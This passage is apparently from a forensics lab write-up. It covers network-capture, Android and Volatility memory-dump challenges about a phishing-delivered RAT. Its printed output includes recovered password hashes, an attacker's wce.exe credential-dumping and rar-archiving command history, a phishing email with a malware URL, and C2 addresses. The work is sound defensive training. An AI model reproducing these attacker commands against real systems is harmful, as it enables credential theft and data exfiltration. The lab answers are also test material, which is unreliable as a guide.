I first looked into any HTTP requests that might have downloaded an image, with no luck. Then I looked into FTP requests, finding 2 image files. A quick File -> Export -> FTP gave me the file to work with.

Question 7

What is the ephemeral public key provided by the server during the TLS handshake in the session with the session ID: da4a0000342e4b73459d7360b4bea971cc303ac18d29b99067e46d16cc07f4ff?

Answer 7

I searched the above string with CRTL+F, making sure to specify packet details and string.

Leading me to packet number, 26913. Which held the public key, as seen in the image above.

Question 8

What is the first TLS 1.3 client random that was used to establish a connection with protonmail.com?

Answer 8

Specifying TLSv1.3 in the filter section then looking for the string “protonmail” led me to packet number, 17992. Which in turn gave me the random.

Question 9

Which country is the manufacturer of the FTP server’s MAC address registered in?

Answer 9

Knowing from a previous question what the IP address of the FTP server was, gave me the MAC address. Then I just searched it on a MAC address look up website to find the answer:

Question 10

What time was a non-standard folder created on the FTP server on the 20th of April?

Answer 10

This one I got a little stuck on, but I just had to filter for both FTP and FTP-DATA in order to find the answer. Filtering for FTP didn’t lead to much of anything, just a lot of FTP commands that were thrown around.

After filtering FTP-DATA I managed to find a ton more information. Then I just used Follow -> TCP Stream on the first result to find the following:

Most of those directories are used in Linux, however a folder name ftp is not standard. Which here is the answer.

Question 11

What URL was visited by the user and connected to the IP address 104.21.89.171?

Answer 11

Filtering the above IP address and looking for a Client Hello packet was enough to lead me to the answer:

Scenario

On May 21, 2021, an intelligence agency intercepted a mobile device suspected of covert operations. The forensic team performed a full disk dump, extracting databases, logs, and application activity. Findings suggest encrypted communications, anonymous browsing, and unauthorized data transfers. Analyze extracted data to determine suspect activities, network connections, and security risks while establishing a timeline of events.

Question 1

What is the email address of Zoe Washburne?

Answer 1

The first place I would normally check would be contacts. Most phones have a user contact which stores a lot of information about the user of the phone. So opening up contacts3.db, I was able to find the email address along with more information that might be valuable later on.

Question 2

What was the device’s DateTime in UTC at the time of acquisition?

Answer 2

Looking through some of the provided files, a Live Data folder seemed most interesting. Inside there happened to be a .txt file that contained the date and time in which the capture was taken.

Question 3

What time was the Tor Browser downloaded in UTC?

Answer 3

Within the same folder as the contacts datebase there happened to be a download.db file. A quick look over said file led me to find the exact timestamp in which the Tor Browser was download. I then had to convert it using a free online conversion tool.

Question 4

At what time did the phone reach a 100% charge after the last reset?

Answer 4

Looking through the Dumpsys folder, I found a couple of .txt files that were battery related. The one named batterystats.txt was the most useful. Looking at the first few lines of the file I could see that the reset time was:

Battery History (0% used, 908 used of 512KB, 17 strings using 1928):
                    0 (10) RESET:TIME: 2021-05-21-13-12-19

The scrolling down I found the point in which it reached 100% after being plugged in.

          +4m03s318ms (2) 099 temp=295 volt=4373
          +4m27s915ms (2) 099 brightness=bright
          +4m52s141ms (2) 099 brightness=dark
          +5m01s459ms (3) 100 status=full charge=2665

5 minutes and 1 second after the reset. So some simple addition of the time at restart and 5 mins and 1 second gave me the answer.

Question 5

What is the password for the most recently connected WIFI access point?

Answer 5

This one was a little tricky. All the files that had WiFi in the name didn’t have any indication as to the password of the various networks that the user had come into contact/connected to. Each one saying <removed>.

So looking deeper in to the file system, I found a folder called com.android.providers.settings. Which gave me the following WiFi password:

Question 6

What app was the user focused on at 2021–05–20 14:13:27?

Answer 6

A handy file named usage_stats.txt gave me a full timeline of what app was accessed by the user and when.

Giving me a clear answer, YouTube.

Question 7

How long did the suspect watch YouTube on 2021–05–20?

Answer 7

Looking at the same file, you are able to tell where the app is being used on the screen. Either the foreground or the background. The user started to watch YouTube at 14:13:27 and moved it to the background at 22:47:57.

8 Hours and 34 Minutes.

Question 8

What is the structural similarity metric for the image “suspicious.jpg” compared to a visually similar image taken with a mobile phone?

Answer 8

Using this website, I am able to tell how similar the images are.

The one taken by the user was stored in the DCIM folder on both the SD card and the main android file system.

Scenario

An employee reported that his machine started to act strangely after receiving a suspicious email for a security update. The incident response team captured a couple of memory dumps from the suspected machines for further inspection. Analyze the dumps and help the SOC analysts team figure out what happened!

Question 1

Machine:Target1 What email address tricked the front desk employee into installing a security update?

Answer 1

Despite the tools listed stating that you can use Volatility3, that doesn’t seem to be the case. I couldn’t find a good answer as to why, I think I need to make another profile in order to detect the kernel version. So I will be using Volatility2 for this lab.

First I need to run the imageinfo command to find out what profile I need to be using:

└─$ python2 vol.py -f dump/target1.vmss imageinfo 
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : VMWareAddressSpace (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/home/zero/Documents/volatility2/dump/target1.vmss)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82765be8L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0x82766c00L
                KPCR for CPU 1 : 0x807c5000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2015-10-09 12:53:02 UTC+0000
     Image local date and time : 2015-10-09 08:53:02 -0400

Using one of the suggested profiles, I then looked for any email clients that are running on the system.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 pslist
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x85d0d030 iexplore.exe           2996   2984      6      463      1      0 2015-10-09 11:31:27 UTC+0000                                 
0x85cd3d40 OUTLOOK.EXE            3196   2116     22     1678      1      0 2015-10-09 11:31:32 UTC+0000                                 
0x85d01510 svchost.exe            3232    528      9      131      0      0 2015-10-09 11:31:34 UTC+0000

I next dumps the files that are associated with OUTLOOK.exe.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles -p 3196 --dump-dir dump/files

There was one file that was pulled that caught my interest:

0x83e61be0   3196   \Device\HarddiskVolume2\Users\frontdesk\AppData\Local\Microsoft\Outlook\Frontdesk@allsafecybersec.com - outlook2.ost

This gave me the email address of the person that received the malicious email, along with a file that might contain data pertaining to the sender. Sadly this didn’t work out, so next I tried using memdump to gather the process memory at time of capture. Then after which I used strings to grab any potential email address.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 memdump -p 3196 --dump-dir dump/files
Writing OUTLOOK.EXE [  3196] to 3196.dmp

Strings:

┌──(zero㉿kali)-[~/Documents/volatility2/dump/files]
└─$ strings 3196.dmp | grep @outlook
                                                                                                             
┌──(zero㉿kali)-[~/Documents/volatility2/dump/files]
└─$ strings 3196.dmp | grep @hotmail
                                                                                                             
┌──(zero㉿kali)-[~/Documents/volatility2/dump/files]
└─$ strings 3196.dmp | grep @gmail  
From: The Whit3R0s3 <th3wh1t3r0s3@gmail.com>
Return-Path: th3wh1t3r0s3@gmail.com

Question 2

Machine:Target1 What is the filename that was delivered in the email?

Answer 2

Hedging a bet that the file is more than likely an .exe file, I used strings once again on the dmp file.

$ strings 3196.dmp | grep .exe
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><div dir="ltr">Hello Mr. Wellick,<div><br></div><div>In order to provide the best service, in the most secure manner, AllSafe has recently updated our remote VPN software. Please download the update from the link below.</div><div><br></div><div><a href="http://180.76.254.120/AnyConnectInstaller.exe">http://180.76.254.120/AnyConnectInstaller.exe</a></div><div><br></div><div>If you have any questions please don't hesitate to contact IT support.</div><div><br></div><div>Thanks and have a great day!</div><div>AllSafe IT Support Desk</div></div>

Finding the above in the first couple of lines. An .exe file.

Question 3

Machine:Target1 What is the name of the rat’s family used by the attacker?

Answer 3

Now knowing what the .exe file is called I need to dump the file and upload it to VirusTotal. First of all I need to find the memory address:

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep AnyConnectInstaller.exe              
Volatility Foundation Volatility Framework 2.6.1
0x000000003df12dd0      2      0 RW-rwd \Device\HarddiskVolume2\Users\anyconnect\AnyConnect\AnyConnectInstaller.exe
0x000000003df1cf00      4      0 R--r-d \Device\HarddiskVolume2\Users\anyconnect\AnyConnect\AnyConnectInstaller.exe
0x000000003e0bc5e0      7      0 R--r-d \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe
0x000000003e2559b0      8      0 R--rwd \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe
0x000000003e2ae8e0      8      0 RWD--- \Device\HarddiskVolume2\Users\anyconnect\AnyConnect\AnyConnectInstaller.exe
0x000000003ed57968      4      0 R--r-d \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe

There are quite a few different options here. But the one in the downloads is truly what I am looking for, in other words the source file. There are however 3 of them, I just dumped each one to find a .dat file.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles --dump-dir dump/files -Q 0x000000003e0bc5e0
ImageSectionObject 0x3e0bc5e0   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe
DataSectionObject 0x3e0bc5e0   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles --dump-dir dump/files -Q 0x000000003ed57968
ImageSectionObject 0x3ed57968   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe
DataSectionObject 0x3ed57968   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe

Both of the above addresses worked. Giving me the .dat file which contains the data of the malware, which I can then upload to VirusTotal.

A small note, sometimes the answers to the questions regarding malware families can be a little miss leading. Since there are a TON of different names that are listed in VirusTotal. For example, this malware goes by the names:

Xtrat
Seint
Bifrose
RATX
Buzus
Lydra
xtreme
trojan.dump/msil

None of which are the answer, however knowing its a rat, xtrat and ratx are closest to what I need. In this case the answer is: XTREMERAT. Needless to say, I do not like these types of questions since the answer can be many different things depending on when you carry out the lab. For example, looking over 2 of the guides that are linked on the labs page have the answer given out by an anti virus vendor Webroot.

Question 4

Machine:Target1 The malware appears to be leveraging process injection. What is the PID of the process that is injected?

Answer 4

I needed a little nudge in the right direction for this one, plus I learnt a new malware technique in the process. Process hollowing. I had to get a new plugin for Volatility for this, which can be found here, I then tried to find any suspicious process hollowing attempts within the system.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 hollowfind
Hollowed Process Information:
        Process: wininit.exe PID: 420
        Parent Process: NA PPID: 360
        Creation Time: 2015-10-09 11:30:48 UTC+0000
        Process Base Name(PEB): wininit.exe
        Command Line(PEB): wininit.exe
        Hollow Type: No VAD Entry For Process Executable

VAD and PEB Comparison:
        Base Address(VAD): 0x0
        Process Path(VAD): NA
        Vad Protection: NA
        Vad Tag: NA

        Base Address(PEB): 0xcf0000
        Process Path(PEB): C:\Windows\system32\wininit.exe
        Memory Protection: PAGE_EXECUTE_WRITECOPY
        Memory Tag: Vad 

        No Hexdump: Memory Unreadable at 0x00cf0000

Similar Processes:
        wininit.exe(420) Parent:NA(360) Start:2015-10-09 11:30:48 UTC+0000

Suspicious Memory Regions:
        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad 
---------------------------------------------------

Hollowed Process Information:
        Process: iexplore.exe PID: 2996
        Parent Process: NA PPID: 2984
        Creation Time: 2015-10-09 11:31:27 UTC+0000
        Process Base Name(PEB): iexplore.exe
        Command Line(PEB): "C:\Program Files\Internet Explorer\iexplore.exe"
        Hollow Type: Process Base Address and Memory Protection Discrepancy

VAD and PEB Comparison:
        Base Address(VAD): 0x12d0000
        Process Path(VAD): \Program Files\Internet Explorer\iexplore.exe
        Vad Protection: PAGE_EXECUTE_WRITECOPY
        Vad Tag: Vad 

        Base Address(PEB): 0x13400000
        Process Path(PEB): C:\Program Files\Internet Explorer\iexplore.exe
        Memory Protection: PAGE_READWRITE
        Memory Tag: VadS

0x13400000  4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00   MZP.............
0x13400010  b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00   ........@.......
0x13400020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x13400030  00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00   ................

Similar Processes:
        iexplore.exe(2996) Parent:NA(2984) Start:2015-10-09 11:31:27 UTC+0000

Suspicious Memory Regions:
        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad 
---------------------------------------------------

Hollowed Process Information:
        Process: smss.exe PID: 276
        Parent Process: System PPID: 4
        Creation Time: 2015-10-09 11:30:44 UTC+0000
        Process Base Name(PEB): smss.exe
        Command Line(PEB): \SystemRoot\System32\smss.exe
        Hollow Type: No VAD Entry For Process Executable

VAD and PEB Comparison:
        Base Address(VAD): 0x0
        Process Path(VAD): NA
        Vad Protection: NA
        Vad Tag: NA

        Base Address(PEB): 0x48010000
        Process Path(PEB): \SystemRoot\System32\smss.exe
        Memory Protection: PAGE_EXECUTE_WRITECOPY
        Memory Tag: Vad 

        No Hexdump: Memory Unreadable at 0x48010000

Similar Processes:
        smss.exe(276) Parent:System(4) Start:2015-10-09 11:30:44 UTC+0000

Suspicious Memory Regions:
        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad 
---------------------------------------------------

Hollowed Process Information:
        Process: msdtc.exe PID: 1980
        Parent Process: services.exe PPID: 528
        Creation Time: 2015-10-09 11:30:55 UTC+0000
        Process Base Name(PEB): msdtc.exe
        Command Line(PEB): C:\Windows\System32\msdtc.exe
        Hollow Type: No VAD Entry For Process Executable

VAD and PEB Comparison:
        Base Address(VAD): 0x0
        Process Path(VAD): NA
        Vad Protection: NA
        Vad Tag: NA

        Base Address(PEB): 0xb40000
        Process Path(PEB): C:\Windows\System32\msdtc.exe
        Memory Protection: PAGE_EXECUTE_WRITECOPY
        Memory Tag: Vad 

        No Hexdump: Memory Unreadable at 0x00b40000

Similar Processes:
        msdtc.exe(1980) Parent:services.exe(528) Start:2015-10-09 11:30:55 UTC+0000

Suspicious Memory Regions:
        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad 
---------------------------------------------------

There is one result in the list here that stands out from the rest. iexplore.exe, which is the Internet Explorer executable. The output notes: process base address and memory protection discrepancy, which after reading this article signaled to me I was on the right track.

Giving me the answer: PID 2996.

Question 5

Machine:Target1 What is the unique value the malware is using to maintain persistence after reboot?

Answer 5

When looking into malware maintaining persistence my first thought it looking into the registry keys. Going back to the VirusTotal results I can see that the malware sets the value MrRobot to be used on startup/reboot.

Question 6

Machine:Target1 Malware often uses a unique value or name to ensure that only one copy runs on the system. What is the unique name the malware is using?

Answer 6

Here I was looking for any type of mutated file name, one that would be different from the injected process from the previous question. There is a section on VirusTotal for this and it showed the following:

Instantly, fsociety0.dat stood out. There is another way of doing this, using Volatility. Using handles:

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 handles -p 2996 | grep Mutant
Volatility Foundation Volatility Framework 2.6.1
0x85c80238   2996       0x18   0x1f0001 Mutant           
0x8560f0c0   2996       0xa4   0x100000 Mutant           RasPbFile
0x85d1be20   2996       0xe4   0x1f0001 Mutant           
0x85d1bd90   2996       0xec   0x1f0001 Mutant           
0x85d11500   2996      0x118   0x1f0001 Mutant           
0x85d118d0   2996      0x124   0x1f0001 Mutant           
0x85d1b0f0   2996      0x14c   0x1f0001 Mutant           
0x85d11700   2996      0x150   0x1f0001 Mutant           fsociety0.dat
0x85c76b80   2996      0x36c   0x1f0001 Mutant           ZonesCounterMutex
0x85c73da8   2996      0x3ac   0x1f0001 Mutant           ZoneAttributeCacheCounterMutex
0x85c81270   2996      0x3b4   0x1f0001 Mutant           ZonesCacheCounterMutex
0x85c73da8   2996      0x3b8   0x1f0001 Mutant           ZoneAttributeCacheCounterMutex
0x85928fe0   2996      0x3bc   0x1f0001 Mutant           ZonesLockedCacheCounterMutex
0x83e99318   2996      0x588   0x1f0001 Mutant           
0x83fc4450   2996      0x5b4   0x1f0001 Mutant           TeamViewerHooks_LogBuffer
0x84016860   2996      0x5b8   0x1f0001 Mutant           TeamViewerHooks_Mutex4
0x84009200   2996      0x5bc   0x1f0001 Mutant           TeamViewerHooks_Mutex1
0x8402ca90   2996      0x5c4   0x1f0001 Mutant           TeamViewerHooks_Mutex5
0x84015b98   2996      0x5d4   0x1f0001 Mutant           TeamViewerHooks_DynamicMemMutex
0x84015b38   2996      0x5d8   0x1f0001 Mutant           TeamViewerHooks_DirectXBufferMutex

Question 7

Machine:Target1 It appears that a notorious hacker compromised this box before our current attackers. Name the movie he or she is from.

Answer 7

The easiest way I have found when looking for usernames in a system image, is using the following command:

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep User 

Using grep to only grab entries with User in them, means that you are likely to uncover file structures for each user on the system.

\Device\HarddiskVolume2\Users\zerocool\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini

Question 8

Machine:Target1 What is the NTLM password hash for the administrator account?

Answer 8

This one took quite a bit of doing. I had never installed the Crypto.hash plugin for Volatility before. But after smashing my head against my desk for 20 mins, I found THIS to be the solution to getting it working.

Now on with the question at hand. Using the hashdump plugin, I got the following output:

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 hashdump 
Volatility Foundation Volatility Framework 2.6.1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:79402b7671c317877b8b954b3311fa82:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
front-desk:1000:aad3b435b51404eeaad3b435b51404ee:2ae4c526659523d58350e4d70107fc11:::

Question 9

Machine:Target1 The attackers appear to have moved over some tools to the compromised front desk host. How many tools did the attacker move?

Answer 9

Checking the Windows Temp folder location is always a good start:

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep '\\Windows\\Temp\\'
Volatility Foundation Volatility Framework 2.6.1
0x000000003df31038      8      0 R--r-- \Device\HarddiskVolume2\Windows\Temp\wce.exe
0x000000003e1eee10      7      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\getlsasrvaddr.exe
0x000000003e25eca8      5      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\wce.exe
0x000000003eca37f8      8      0 -W-r-- \Device\HarddiskVolume2\Windows\Temp\w.tmp
0x000000003fa633f0      1      0 R--rw- \Device\HarddiskVolume2\Windows\Temp\Rar.exe
0x000000003fc3fb80      6      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\nbtscan.exe
0x000000003fc5af80      7      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\Rar.exe
0x000000003fcaa598      8      0 -W-rw- \Device\HarddiskVolume2\Windows\Temp\MpCmdRun.log
0x000000003fdb7808      8      0 -W-r-- \Device\HarddiskVolume2\Windows\Temp\nbs.txt
0x000000003fdd4ca0      7      0 R--r-- \Device\HarddiskVolume2\Windows\Temp\nbtscan.exe

A few .exe files here. After looking up each of them individually, I narrowed it down to the following:

wce.exe
getlsasrvaddr.exe
nbtscan.exe
Rar.exe

wce.exe, is a windows credential editor which can add, change, list and delete associated credentials. Suspicious.

getlsasrvaddr.exe, is bundled with wce.exe, that automatiaclly obtains needed addresses for wce.exe. Suspicious.

nbtscan.exe is a NETBIOS nameserver scanner for local or remote TCP/IP connections. Suspicious.

Rar.exe, I am not sure. A little research maybe hinted at WinRar? The answer in the end was 3. So it either counted Rar.exe, or didn’t and had getlsasrvaddr.exe as a separate program. Pretty sure its the latter.

Question 10

Machine:Target1 What is the password for the front desk local administrator account?

Answer 10

First of all I need to grab the password hashes once again.

└─$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 hashdump 
Volatility Foundation Volatility Framework 2.6.1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:79402b7671c317877b8b954b3311fa82:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
front-desk:1000:aad3b435b51404eeaad3b435b51404ee:2ae4c526659523d58350e4d70107fc11:::

Then using a simple online tool I am able to grab the password:

Question 11

Machine:Target1 What is the std create data timestamp for the nbtscan.exe tool?

Answer 11

First I tried dumping the files and uploading them to VirusTotal to get a timestamp, which is normally quite reliable. It was created back in 2008, but this turned out not to be the answer.

So next I tried the timeliner plugin to see if it appears there. I made a note about this, but make sure you are piping in grep to grab specific results.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 timeliner | grep nbtscan
Volatility Foundation Volatility Framework 2.6.1
2015-10-09 10:45:12 UTC+0000|[SHIMCACHE]| \??\C:\Windows\Temp\nbtscan.exe| 

The question meant what time it was created on the system. Not when the file was first created.

Question 12

Machine:Target1 The attackers appear to have stored the output from the nbtscan.exe tool in a text file on a disk called nbs.txt. What is the IP address of the first machine in that file?

Answer 12

A pretty simple task, first make sure the file exists and grab its memory location, then dump the file.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep nbs.txt    
Volatility Foundation Volatility Framework 2.6.1
0x000000003fdb7808      8      0 -W-r-- \Device\HarddiskVolume2\Windows\Temp\nbs.txt

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles --dump-dir dump/files -Q 0x000000003fdb7808
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x3fdb7808   None   \Device\HarddiskVolume2\Windows\Temp\nbs.txt

Once I had the .dat file, I copied the contents and threw it into CyberChef and used the From Hex function to get a human readable output.

Question 13

Machine:Target1 What is the full IP address and the port was the attacker’s malware using?

Answer 13

Knowing the malicious PID for iexplore.exe was 2996. A simple netscan told me all I needed to know:

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 netscan | grep 2996
Volatility Foundation Volatility Framework 2.6.1
0x3e0eedf8         TCPv4    10.1.1.20:49205                180.76.254.120:22    ESTABLISHED      2996     iexplore.exe 

Question 14

Machine:Target1 It appears the attacker also installed legit remote administration software. What is the name of the running process?

Answer 14

I had seen this name crop up a few times during different questions, but using pstree I was able to find its PID and other information about it.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 pstree | grep TeamViewer 
Volatility Foundation Volatility Framework 2.6.1
 0x84013598:TeamViewer.exe                           2680   1696     28    632 2015-10-09 12:08:46 UTC+0000
. 0x858bc278:TeamViewer_Des                          1092   2680     16    405 2015-10-09 12:10:56 UTC+0000

Question 15

Machine:Target1 It appears the attackers also used a built-in remote access method. What IP address did they connect to?

Answer 15

I know of a couple remote access methods that are built into Windows, one of which is Remote Desktop Connection, (RDP). An .exe file it uses is mstsc.exe, which shows up in the netscan results.

$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 netscan | grep mstsc
Volatility Foundation Volatility Framework 2.6.1
0x3fb7a560         TCPv4    10.1.1.20:49301                10.1.1.21:3389       ESTABLISHED      2844     mstsc.exe

Question 16

Machine:Target2 It appears the attacker moved latterly from the front desk machine to the security admins (Gideon) machine and dumped the passwords. What is Gideon’s password?

Answer 16

So I had to reread this question, this isn’t the passwords that I have gotten in the past from using hashdump, this is the attackers dumping them into a file somewhere.

I tried cmdscan and the following output caught my interest:

Cmd #0 at 0xe6030: cd C:\Users
Cmd #1 at 0xe6ea8: dir
Cmd #2 at 0xee3d0: wce.exe -w > gideon/w.tmp

Knowing wce.exe was used to grab passwords and such this was obviously the attacker placing its dumped results into a file called w.tmp. So next I used filescan to grab the memory location and extract the file.

Question 17

Machine:Target2 Once the attacker gained access to “Gideon,” they pivoted to the AllSafeCyberSec domain controller to steal files. It appears they were successful. What password did they use?

Answer 17

I had the answer to this one looking at me in the face, however I was unfamiliar with WinRar’s switches and commands.

$ python2 vol.py -f dump/target2.vmss --profile=Win7SP1x86_23418 consoles

CommandHistory: 0xe9198 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 18 LastAdded: 17 LastDisplayed: 17
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 at 0xe6030: cd C:\Users
Cmd #1 at 0xe6ea8: dir
Cmd #2 at 0xee3d0: wce.exe -w > gideon/w.tmp
Cmd #3 at 0xe0170: who ami
Cmd #4 at 0xe0188: whoami
Cmd #5 at 0xea3c8: net use z: \\10.1.1.2\c$
Cmd #6 at 0xe01b8: cd z:
Cmd #7 at 0xe6ed8: dir
Cmd #8 at 0xe6070: cd gideon
Cmd #9 at 0xe6ef8: dir
Cmd #10 at 0xe6f08: z:
Cmd #11 at 0xe6f18: dir
Cmd #12 at 0xf2418: copy c:\users\gideon\rar.exe z:\crownjewels
Cmd #13 at 0xe0cb8: cd crownjewels
Cmd #14 at 0xe6f28: dir
Cmd #15 at 0xe6f38: rar
Cmd #16 at 0xf2478: rar crownjewlez.rar *.txt -hp123qwe!@#
Cmd #17 at 0xf24d0: rar a -hp123!@#qwe crownjewlez.rar *.txt

So the above is the output from the consoles command, minus the unwanted stuff. Cmd line 16 creates the rar archive and sets the password.

Question 18

Machine:Target2 What was the name of the RAR file created by the attackers?

Answer 18

The code in the previous question lays out the answer for this one.

Question 19

Machine:Target2 How many files did the attacker add to the RAR archive?

Answer 19

This was a tough question. Knowing they used a wildcard to add all text files to the rar file wasn’t enough. Using memdump I got the memory from cmd.exe, the using the linux strings ultility I turned the .dmp file into a .txt. This however didn’t give me anything usable, it turns out you need some encoding when using strings. I used the following:

$ strings -el 3048.dmp > 3048.txt 

$ cat 3048.txt | grep '\\crownjewels\\'| grep ".txt"
\crownjewels\SecretSauce2.txt
\crownjewels\SecretSauce1.txt
\crownjewels\SecretSauce3.txt

Giving me the answer I was looking for.

Question 20

Machine:Target2 The attacker appears to have created a scheduled task on Gideon’s machine. What is the name of the file associated with the scheduled task?

Answer 20

My first port of call was to check the /Tasks/ folder in the Windows directory. While the output was quite large, there was one file that stood out to me, At1.job. After a quick search online, I found that it had its own MITRE ATT&CK ID, that talks about scheduled tasks. So I decided to dump the file and use CyberChef to decode the output for anything of interest.

Instantly c:\users\gidon\1.ba stood out to me. The text seems to be cut off, so I found the files location:

$ python2 vol.py -f dump/target2.vmss --profile=Win7SP1x86_23418 filescan | grep '\\gideon\\'
Volatility Foundation Volatility Framework 2.6.1
0x000000003e027038      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Pictures\desktop.ini
0x000000003e1267a0      8      0 RWD--- \Device\HarddiskVolume2\Users\gideon\Rar.exe
0x000000003ec3d8e0      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Links\desktop.ini
0x000000003f427e50      8      0 RWD--- \Device\HarddiskVolume2\Users\gideon\1.bat
0x000000003fa57d98      8      0 RWD--- \Device\HarddiskVolume2\Users\gideon\wce.exe
0x000000003fb36be8      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Saved Games\desktop.ini
0x000000003fb5fda0      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Desktop\desktop.ini
0x000000003fb6ff80      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Documents\desktop.ini
0x000000003fb7bc38      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Contacts\desktop.ini
0x000000003fb906e0      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Music\desktop.ini
0x000000003fcaff50      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Favorites\desktop.ini
0x000000003fcf2798      8      0 -W-r-- \Device\HarddiskVolume2\Users\gideon\w.tmp
0x000000003fd05968      5      0 R--r-d \Device\HarddiskVolume2\Users\gideon\wce.exe
0x000000003fdba758      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Searches\desktop.ini
0x000000003fdbed38      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Videos\desktop.ini
0x000000003fdd4178      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Downloads\desktop.ini

It’s real name was 1.bat, which made more sense. Then after dump that I could see it was the file I was looking for.

Question 21

Machine:POS What is the malware CNC’s server?

Answer 21

Knowing I am looking for any connections to do with iexplore.exe, a simple netscan gave me this:

$ python2 vol.py -f dump/pos.vmss --profile=Win7SP1x86_23418 netscan
0x3e135df8         TCPv4    10.1.1.10:58751                54.84.237.92:80      CLOSE_WAIT       3208     iexplore.exe 

Question 22

Machine:POS What is the common name of the malware used to infect the POS system?

Answer 22

So for this I know I needed to dump the iexplore.exe file from before. I used Malfind to get the PID and then dumped it via Malfind.

$ python2 vol.py -f dump/pos.vmss --profile=Win7SP1x86_23418 malfind -p 3208 -D dump/files
Volatility Foundation Volatility Framework 2.6.1
Process: iexplore.exe Pid: 3208 Address: 0x50000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 11, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x0000000000050000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
0x0000000000050010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
0x0000000000050020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x0000000000050030  00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00   ................

0x0000000000050000 4d               DEC EBP
0x0000000000050001 5a               POP EDX
0x0000000000050002 90               NOP
0x0000000000050003 0003             ADD [EBX], AL
0x0000000000050005 0000             ADD [EAX], AL
0x0000000000050007 000400           ADD [EAX+EAX], AL
0x000000000005000a 0000             ADD [EAX], AL
0x000000000005000c ff               DB 0xff
0x000000000005000d ff00             INC DWORD [EAX]
0x000000000005000f 00b800000000     ADD [EAX+0x0], BH
0x0000000000050015 0000             ADD [EAX], AL
0x0000000000050017 004000           ADD [EAX+0x0], AL
0x000000000005001a 0000             ADD [EAX], AL
